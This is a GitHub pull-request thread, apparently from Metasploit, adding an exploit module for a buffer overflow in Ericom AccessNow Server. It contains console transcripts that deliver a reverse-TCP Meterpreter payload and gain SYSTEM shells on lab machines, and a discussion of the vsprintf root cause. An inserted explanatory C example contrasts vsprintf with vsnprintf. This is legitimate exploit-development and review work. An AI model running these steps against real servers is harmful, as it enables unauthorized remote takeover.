
Add module for ZDI-14-160 Ericom AccessNow Server Buffer Overflow #3460

Merged
merged 3 commits into from Jun 18, 2014

Conversation

jvazquez-r7
Contributor

Tested successfully on Win2003 SP2 and Ericom AccessNow Server 2.4.0.2.

Verification

  • Install Windows 2003 SP2
  • Install Ericom AccessNow Server 2.4.0.2, which can be downloaded from http://www.ericom.com/accessnow_older_version.asp (at least at the time of writing). I couldn't find an unpatched version 3 installer :(
  • Use the module like in the demo, and hopefully enjoy sessions!
msf > use exploit/windows/http/ericom_access_now_bof
msf exploit(ericom_access_now_bof) > set rhost 172.16.158.182
rhost => 172.16.158.182
msf exploit(ericom_access_now_bof) > check
[*] 172.16.158.182:8080 - The target appears to be vulnerable.
msf exploit(ericom_access_now_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ericom_access_now_bof) > set lhost 172.16.158.1
lhost => 172.16.158.1
msf exploit(ericom_access_now_bof) > exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.182:8080 - Sending malformed request...
[*] Sending stage (769536 bytes) to 172.16.158.182
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.182:1054) at 2014-06-17 15:06:41 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : JUAN-6ED9DB6CA8
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.182 - Meterpreter session 1 closed.  Reason: User exit

@OJ OJ self-assigned this Jun 17, 2014
@kernelsmith
Contributor

I got this

@OJ
Contributor

OJ commented Jun 17, 2014

@kernelsmith
Contributor

@jvazquez-r7 Win2k3 to avoid ASLR issues?
@OJ I'm a dumb American, no speaky your frufru language. You're lucky Google isn't as narrow-minded as I am. I can do 'Merican, Spanish, a sprinkle of German, and a touch of Albanian only

'Name' => 'Ericom AccessNow Server Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in Ericom AccessNow Server. The
vulnerability is due to an insecure usage of vsprintf with used controlled data,
Contributor


"user controlled data", not "used controlled data" -- I can cleanup on landing

Contributor Author


thanks!

@jvazquez-r7
Contributor Author

@kernelsmith yup :( Hard to make it happen with ASLR enabled with just this vuln, I think, since data is appended after the controlled data; it looks hard to work with a least-significant-byte overwrite to bypass ASLR here. Any ideas to bypass ASLR here with this vuln? I'm happy to invest more time if there are proposals! Thanks for reviewing!

@OJ
Contributor

OJ commented Jun 17, 2014

I shall leave this baby to @kernelsmith :)

@OJ OJ assigned kernelsmith and unassigned OJ Jun 17, 2014
@kernelsmith
Contributor

@jvazquez-r7 I have the pre-patch ver 3.x installer if you want it. I'll take a look into the ASLR issue, but not before I land this. Also, the vuln in 2.4 looks different from the one in 3.x, so I think technically this isn't the same as the one listed by ZDI, but whatever. I'll also look at porting it to 3.x and maybe we can keep it all in one module.

BTW, working on XP:

msf exploit(ericom_access_now_bof) > so

Module options (exploit/windows/http/ericom_access_now_bof):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        Use a proxy chain
   RHOST    192.168.66.128   yes       The target address
   RPORT    8080             yes       The target port
   VHOST                     no        HTTP server virtual host

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     192.168.66.1     yes       The listen address
   LPORT     8989             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Ericom AccessNow Server 2.4.0.2 / Windows [XP SP3 / 2003 SP2]

msf exploit(ericom_access_now_bof) > exploit

[*] Started reverse handler on 192.168.66.1:8989
[*] 192.168.66.128:8080 - Sending malformed request...
[*] Sending stage (769536 bytes) to 192.168.66.128
[*] Meterpreter session 1 opened (192.168.66.1:8989 -> 192.168.66.128:1207) at 2014-06-17

@kernelsmith
Contributor

working on 2k3 as well, landing

msf exploit(ericom_access_now_bof) > so

Module options (exploit/windows/http/ericom_access_now_bof):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        Use a proxy chain
   RHOST    192.168.66.216   yes       The target address
   RPORT    8080             yes       The target port
   VHOST                     no        HTTP server virtual host

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     192.168.66.1     yes       The listen address
   LPORT     8989             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Ericom AccessNow Server 2.4.0.2 / Windows [XP SP3 / 2003 SP2]

msf exploit(ericom_access_now_bof) > exploit

[*] Started reverse handler on 192.168.66.1:8989
[*] 192.168.66.216:8080 - Sending malformed request...
[*] Sending stage (769536 bytes) to 192.168.66.216
[*] Meterpreter session 2 opened (192.168.66.1:8989 -> 192.168.66.216:1028) at 2014-06-17 

meterpreter > sysinfo
Computer        : WIN2K3
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter >

@kernelsmith
Contributor

y u no close as merged PR?

@OJ
Contributor

OJ commented Jun 18, 2014

Troll gods.

@jvazquez-r7
Contributor Author

@kernelsmith, I fixed the typo myself in this commit: jvazquez-r7@f622a3a, but you didn't land this last commit and fixed the typo yourself. Because of that this pull request has not been closed. You can make GitHub close it by landing the forgotten commit :)

@jvazquez-r7
Contributor Author

@kernelsmith indeed the ZDI advisory is a little bit confusing in my opinion: "The specific flaw exists in the way AccessServer32.exe handles requests for non-existent files" <-- Indeed it's not while handling requests for non-existent files. At least in the 2.4 version, it's while building error messages in an insecure way with vsprintf. If you send a long URI (for a non-existing resource), the vsprintf will overflow when building a "File not found" message. But if you overflow with a bad HTTP query the error string will be an "Incorrect request" one. I've preferred the "Incorrect request" case because there are not so many badchar restrictions when exploiting =) (I'm lazy.) But my guess is that the vulnerability is the same one the ZDI is reporting. (Indeed the patch is a switch to vsnprintf, if I am remembering correctly (sorry for writing without double checking... shame).)
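
The bug class being discussed in the thread, shown as an added example that is not the module's, Ericom's, or either commenter's code: an error-message builder that formats a request path into a fixed-size stack buffer with vsprintf, beside the vsnprintf form the thread says the vendor patch switched to. The buffer capacity, the "File not found" format string, and the function names are constructed for illustration; what the example demonstrates is that the bounded variant reports the length it wanted so the caller can detect truncation instead of silently writing past the buffer.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Constructed, deliberately small capacity so truncation is easy to observe. */
#define ERRMSG_CAP 64

/* Vulnerable pattern: vsprintf is never told how large 'buf' is, so a
 * long attacker-supplied string behind "%s" runs straight past its end.
 * Only ever called here with input that fits; it exists for comparison. */
int format_error_unsafe(char *buf, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int n = vsprintf(buf, fmt, ap);   /* unbounded write into buf */
    va_end(ap);
    return n;
}

/* Hardened form: vsnprintf is given the capacity, always NUL-terminates
 * when cap > 0, and returns the length it *wanted* to write. Comparing
 * that against cap tells the caller whether the message was cut short. */
int format_error_safe(char *buf, size_t cap, int *truncated, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int n = vsnprintf(buf, cap, fmt, ap);
    va_end(ap);
    if (n < 0) {                 /* encoding error: leave a known-safe empty string */
        if (cap > 0) buf[0] = '\0';
        *truncated = 0;
        return -1;
    }
    *truncated = (size_t)n >= cap;
    return n;
}

/* Builds a "File not found" style message for a request path (hypothetical
 * helper; the real server's format strings are not on the page). */
int build_not_found(char *buf, size_t cap, const char *path, int *truncated)
{
    return format_error_safe(buf, cap, truncated, "File not found: %s", path);
}

int main(void)
{
    char buf[ERRMSG_CAP];
    int trunc;
    char long_path[200];                 /* constructed over-long request path */
    memset(long_path, 'A', sizeof long_path - 1);
    long_path[sizeof long_path - 1] = '\0';

    build_not_found(buf, sizeof buf, "/index.html", &trunc);
    printf("%s (truncated=%d)\n", buf, trunc);

    build_not_found(buf, sizeof buf, long_path, &trunc);
    printf("%zu bytes kept, truncated=%d\n", strlen(buf), trunc);
    return 0;
}
```

The same 200-byte path that the unbounded variant would write across the stack is reduced to ERRMSG_CAP - 1 bytes plus a terminator by the bounded one, and the caller learns that the message was truncated and can log or reject the request rather than trusting a half-written string.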

@jvazquez-r7
Contributor Author

@kernelsmith if you could share the pre-patch binary for version 3 it would be cool =) I couldn't find it on the vendor homepage :( Looks like there aren't vulnerable 3.x installers anymore on the vendor page.

I'd be happy to confirm my feelings about the vulnerability root cause on version 3 and share my opinion :)

@kernelsmith
Contributor

This advisory does not apply to 2.4, only 3.1. The vuln in 2.4 is a separate vuln. The vuln in 3.1 may be a failed patch for the vuln in 2.4, I haven’t looked at 2.4 yet.

On Jun 17, 2014, at 11:20 PM, Juan Vazquez notifications@github.com wrote:

@kernelsmith indeed the ZDI advisory is a little bit confusing in my opinion: "The specific flaw exists in the way AccessServer32.exe handles requests for non-existent files" <-- Indeed it's not while handling requests for non-existent files. At least in the 2.4 version, it's while building error messages in an insecure way with vsprintf. If you send a long URI (for a non-existing resource), the vsprintf will overflow when building a "File not found" message. But if you overflow with a bad HTTP query the error string will be an "Incorrect request" one. I've preferred the "Incorrect request" case because there are not so many badchar restrictions when exploiting =) (I'm lazy.) But my guess is that the vulnerability is the same one the ZDI is reporting. (Indeed the patch is a switch to vsnprintf, if I am remembering correctly (sorry for writing without double checking... shame).)


@kernelsmith kernelsmith merged commit f622a3a into rapid7:master Jun 18, 2014
kernelsmith added a commit that referenced this pull request Jun 18, 2014
@jvazquez-r7
Contributor Author

You did it! great work @kernelsmith ! :D

@jvazquez-r7 jvazquez-r7 deleted the ericom_accessnow branch November 18, 2014 15:46